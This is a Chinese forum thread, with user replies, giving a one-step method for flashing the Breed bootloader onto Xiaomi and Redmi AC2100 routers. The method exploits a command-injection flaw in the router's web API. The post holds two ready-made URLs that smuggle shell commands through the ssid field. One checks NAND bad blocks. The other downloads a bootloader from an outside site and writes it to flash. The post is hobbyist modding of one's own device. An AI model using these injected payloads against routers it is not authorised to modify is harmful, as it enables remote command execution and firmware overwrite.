QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888

[AC2100(RM2100)] 小米 红米【AC2100】一键刷BREED【30秒刷完】小白帅小伙专用 检查坏块 | 无需Telnet

火... [复制链接]

2021/12/14 更新BREED的URL。BREED是老版本,需要新版的可以后期进入BREED刷入。代码自带校验固件,放心食用。

2021/01/17 修复关于BREED代码不运行问题
2021/01/18 小米固件下载地址错误。感谢网友“vanthoff”,小米固件下载地址已经更新
2021/01/21 增加检查NAND坏块代码,在隐藏内容那里
2021/01/25 修复查坏块代码显示Bad,而不是具体坏块位置
2021/02/09 更新检查坏块代码

——————————————————————————————————————————————————

我发现就算再怎么简单,都会有人不会刷BREED。
今天花了点时间从新写了URL注入,只需要一步就可以刷BREED。30秒刷完!!!

刷机有风险!变砖别来怪我!

1. 首先需要降级固件:
    红米AC2100:http://cdn.cnbj1.fds.api.mi-img. ... are_d6234_2.0.7.bin
    小米AC2100:http://cdn.cnbj1.fds.api.mi-img. ... e_4b519_2.0.722.bin

下载完成后进入后台 192.168.31.1->常用设置->系统状态->手动升级
    加载固件,可以保留数据->开始升级

——————————————————————————————————————————————————

下面开始进入主题,真·30秒刷BREED!

首先需要确保路由器有网络,有网络才能自动下载BREED。
2. 进入后台192.168.31.1,复制自己的stok,看图

3. 用复制的stok替换掉下面代码(隐藏内容)中的CCCCCCCCCCC(看图)

4. 复制修改好stok的代码,粘贴到浏览器,回车(浏览器会显示 :  {"code":0} ). 如果显示其他代码,可能是你还没降级固件或者stok过期。也可以恢复出厂从试。
此代码是用来检查NAND坏块的。路由器开机超过一小时建议先重启。运行代码后,你路由器的2.4g WiFi名称会改名成:比如  "ESMT","Toshiba","Toshiba 90 768"。 90和768是坏块。 如果ESMT或者Toshiba后面没数字,那恭喜你,没有坏块!!!
  1. http://192.168.31.1/cgi-bin/luci/;stok=CCCCCCCCCCC/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=%0A%5B%20-z%20%22%24(dmesg%20%7C%20grep%20ESMT)%22%20%5D%20%26%26%20B%3D%22Toshiba%22%20%7C%7C%20B%3D%22ESMT%22%0Auci%20set%20wireless.%24(uci%20show%20wireless%20%7C%20awk%20-F%20'.'%20'%2Fwl1%2F%20%7Bprint%20%242%7D').ssid%3D%22%24B%20%24(dmesg%20%7C%20awk%20'%2FBad%2F%20%7Bprint%20%245%7D')%22%0A%2Fetc%2Finit.d%2Fnetwork%20restart%0A
复制代码

此代码是用来刷BREED的。你可以先检查坏块,不检查也没关系。Bootloader那里肯定不会有坏块,不然官方Uboot也会出问题的。
  1. http://192.168.31.1/cgi-bin/luci/;stok=CCCCCCCCCCC/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=%0Acd%20%2Ftmp%0Acurl%20-o%20B%20-O%20https%3A%2F%2Fbreed.hackpascal.net%2Fr1286%2520%255b2020-10-09%255d%2Fbreed-mt7621-xiaomi-r3g.bin%20-k%20-g%0A%5B%20-z%20%22%24(sha256sum%20B%20%7C%20grep%20242d42eb5f5aaa67ddc9c1baf1acdf58d289e3f792adfdd77b589b9dc71eff85)%22%20%5D%20%7C%7C%20mtd%20-r%20write%20B%20Bootloader%0A
复制代码

如果路由器在60秒内重启则代表刷BREED成功(灯会从,最终变进入系统)
如果没重启,可能是stok过期了。进入后台复制新的stok即可。也有可能下载的BREED损坏,从新运行代码。也有可能没网络。

成功后拔掉电源,按住reset同时接上电源等10秒即可进入breed。需要注意的是如果闪蓝灯那就是BREED。如果是闪橘灯那就是原厂UBOOT。
最后用进入浏览器,最好是隐身模式,输入192.168.1.1  ENTER.
刷完后可能无法进入原厂系统,进BREED删变量:normal_firmware_md5

检查NAND坏块代码内容(可以无视):

BREED代码内容(可以无视):
  • 下载BREED
  • 检查BREED是否完好无损(sha256sum)
  • 刷breed, 重启

就这么简单,如果还有人说自己不会刷BREED,我打爆他的头!

刷完BREED升级原厂固件:到这个帖子下载修改好的固件。BREED直接刷,不需要修改帖子上说的那些设置。刷后如果不能进入系统,去breed变量那里删除kernel_panic 和 mt5。)
https://www.right.com.cn/forum/thread-4028850-1-1.html

永久开启 AC2100 原厂固件  TELNET SSH, 可升级 降级 恢复出厂
https://www.right.com.cn/forum/thread-4056385-1-1.html

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

没网线的中继路由器伤不起,第一次就成功了,尴尬的是我还缺少两根网线  发表于 2023-1-18 15:29
你好,请问一下,我使用你的方法倒是刷入了BREED了,但是没有完整的感觉,在环境变量那里是一片空白,任何系统都不能刷了,请问一下怎么补救。可以手动输入环境变量不?有没有哪位好心人给我发一个环境变量的截图啊   发表于 2022-3-9 23:03
第一段代码顺利执行完成,没有坏块。2.4的wifi变成了"ESMT"。 第二段代码输入完成后,好像也是显示{"code":0} ),但是路由器一直闪橙色灯。不重启,后来手动断电,按reset 10秒开机,双闪后,system灯一直   发表于 2022-1-11 12:38
已经用过了,非常好用,谢谢大佬!!!  发表于 2021-4-20 10:30

评分

yanhy + 1 强大的恩山!(以下重复1万次)
yun78 + 2 这个年轻人不讲武德,耗子尾汁!.
apktesl + 1 亲测2.0.745可以刷入
nmccx + 1 一键可以,成功100%
噗噗噗 + 1 强大的恩山!(以下重复1万次)
jadiboy + 1 强大的恩山!(以下重复1万次)
hong766413175 + 1 呐,做人呢,最重要的就是开心.
搁浅520 + 1 感谢你的分享,无论怎样,你都是最无私的人.
成旭超 + 1 你好,久仰卧龙大名,在下凤雏!.
风誓max + 1 强大的恩山!(以下重复1万次)
andyfann + 1 感谢你的分享,无论怎样,你都是最无私的人.
gilbertz + 1 强大的恩山!(以下重复1万次)
nexur + 1 赢了会所嫩模,输了回家蒸馍!
mtrkzhiyuan + 1 你好,吴签兄,认识你很高兴!调侃一下、别.
哎呦我去 + 1 最后一步需要插网线啊你没说!中继路由伤不.
Nz2tap + 1 感谢你的分享,无论怎样,你都是最无私的人.
DPlus + 1 强大的恩山!(以下重复1万次)
HuanYipin + 1 面对这种帖子,我内心复杂,真不知道说什么.
萝卜头V_V + 1 强大的恩山!(以下重复1万次)
long45343 + 1 绝对的好东西
╩华夏の鹰╩ + 2 良心好教程!!!
win2008 + 1 几亿网民,我们俩竟然神奇的在恩山相遇了!.
ha9worm + 1 一看就是觉得高端、大气、上档次!
mobileliker + 1 强大的恩山!(以下重复1万次)
ieasyseek + 1 大神已经更新了红米ac2100 breed的最新版本.
xyq658145 + 1 几亿网民,我们俩竟然神奇的在恩山相遇了!来,1分也是分!
李风陵 + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
tzefqxz + 1 面对这种帖子,我内心复杂,真不知道说什么好……
fateryou + 1 强大的恩山!(以下重复1万次)
阿北鸟 + 1 强大的恩山!(以下重复1万次)
书中语 + 1 没有坏块,breed也成功刷入了。但是一重启breed 蓝灯常亮,获取不到ip,
ppdx + 1 感谢感谢!!!
trion + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
砸七砸八 + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
IN_XX + 1 强大的恩山!(以下重复1万次)
1228427556 + 1 你是有强迫症吗?一定要一帖多发?
新鲜空气 + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
v_kiss + 1 不要怂、就是干!
1569420984 + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
demiscid + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
FM出汗 + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
沫沫呀 + 1 强大的恩山!(以下重复1万次)
阿忒斯特 + 1 强大的恩山!(以下重复1万次)
何为冥 + 1 强大的恩山!(以下重复1万次)
Guaand + 1 How ever,this is JB useful!
zpsr1a + 1 兄弟,你肥皂又掉了…
CO2二仰化叹 + 1 强大的恩山!(以下重复1万次)
tk189043 + 1 开门!我是隔壁老王!
yeluo2018 + 1 几亿网民,我们俩竟然神奇的在恩山相遇了!来,1分也是分!
lzs88888 + 1 不要怂、就是干!
clannannalc + 2 强大的恩山
5oogle + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
kdg + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
hellsakura + 1 这个年轻人不讲武德,耗子尾汁!
scathlon + 1 家里有矿啊?还是矿里有家啊?
wupup + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
ghacky + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
xshow + 1 简单好用!!!!
a287837052 + 1 开门!我是隔壁老王!
614343129 + 1 不要怂、就是干!
crackers + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
pengjianmim + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
shamosky + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
初雪 + 1 2333
159789 + 2 别说了,打钱给他!!!
天下有人 + 1 面对这种帖子,我内心复杂,真不知道说什么好……
ndgpjy + 1 强大的恩山!(以下重复1万次)
q1832 + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
不是空气 + 1 强大的恩山!(以下重复1万次)
liu923074513 + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
一生随性 + 1 这个年轻人不讲武德,耗子尾汁!
fhfh + 1 几亿网民,我们俩竟然神奇的在恩山相遇了!来,1分也是分!
shercker + 1 这个年轻人不讲武德,耗子尾汁!
蓝色枫叶呀 + 1 一看就是觉得高端、大气、上档次!
ayinn + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
audivv + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
God-Sakura + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
yuxiansen12138 + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
MASTERbruce + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
xuye8 + 1 送你一块“恩山”牌肥皂,喏,就在你脚下、捡一下吧……
cjlhll + 1 生活不易,相遇也不易,既然这样,让我们成为朋友一起面朝大海、花开花落……
LiFe0357 + 1 用你的方法成功了,还检出了4个坏块😭
守恒 + 2 这个年轻人不讲武德,耗子尾汁!
黑择明 + 1 风清云淡、飘逸悠然……极爽!
defend3 + 1 强大的恩山!(以下重复1万次)
辣死你娃 + 1 强大的大佬
乱世铜炉 + 1 强大的恩山!(以下重复1万次)
Tooooony + 1 不要怂、就是干!
390517840 + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
gqyun88 + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
cien999 + 1 几亿网民,我们俩竟然神奇的在恩山相遇了!来,1分也是分!
WEBscript + 1 强大的恩山!(以下重复1万次)
4nolove + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
qfby88 + 1 生活不易,相遇也不易,既然这样,让我们成为朋友一起面朝大海、花开花落……
chrisan + 1 强大的恩山!(以下重复1万次)
linuxunion + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
fanhua0609 + 1 赢了会所嫩模,输了回家蒸馍!
djj45 + 1 强大的恩山!(以下重复1万次)
清风夜雨 + 1 感谢分享,简直就是无脑刷。哈哈
wenming1221 + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!

我的恩山、我的无线 The best wifi forum is right here.
前排留名!!!
我的恩山、我的无线 The best wifi forum is right here.

牛逼

谢谢分享

DSADSADSAD SACXZ

很好很强大

感谢分享,马上试试

还是有点不懂  详情 回复 发表于 2021-3-20 23:42

谢谢分享

谢谢分享

方便吗 看看你的

留名!!!!

学习学习!

谢谢大佬分享6666666